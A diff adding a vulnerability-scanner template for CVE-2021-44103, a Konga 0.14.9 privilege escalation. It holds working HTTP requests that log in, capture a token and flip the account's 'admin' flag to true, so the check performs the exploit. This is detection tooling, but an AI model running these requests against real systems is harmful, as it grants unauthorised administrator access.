diff --git a/cves/2021/CVE-2021-44103.yaml b/cves/2021/CVE-2021-44103.yaml new file mode 100644 index 0000000000..e4cc95c704 --- /dev/null +++ b/cves/2021/CVE-2021-44103.yaml @@ -0,0 +1,78 @@ +id: CVE-2021-44103 + +info: + name: KOGA 0.14.9 - Privilege Escalation + author: rschio + severity: high + description: Vertical Privilege Escalation in KONGA 0.14.9 allows attackers to higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter. + reference: + - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html + - https://www.exploit-db.com/exploits/50521 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103 + classification: + cvss-score: 8.7 + cve-id: CVE-2021-44103 + cwe-id: CWE-264 + tags: cve,cve2021,konga,authenticated + +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"password": "{{password}}", "identifier": "{{username}}"} + + - | + POST /api/user/{{id}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Content-Type: application/json;charset=utf-8 + + {"token": "{{token}}"} + + - | + PUT /api/user/{{id}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Content-Type: application/json;charset=utf-8 + + {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"} + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_2, "\"admin\": false")' + - 'contains(body_3, "\"admin\": true")' + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: id + internal: true + group: 1 + regex: + - '"id": ([0-9]+)' + + - type: regex + part: body + name: token + internal: true + group: 1 + regex: + - '"token": "(.*)"'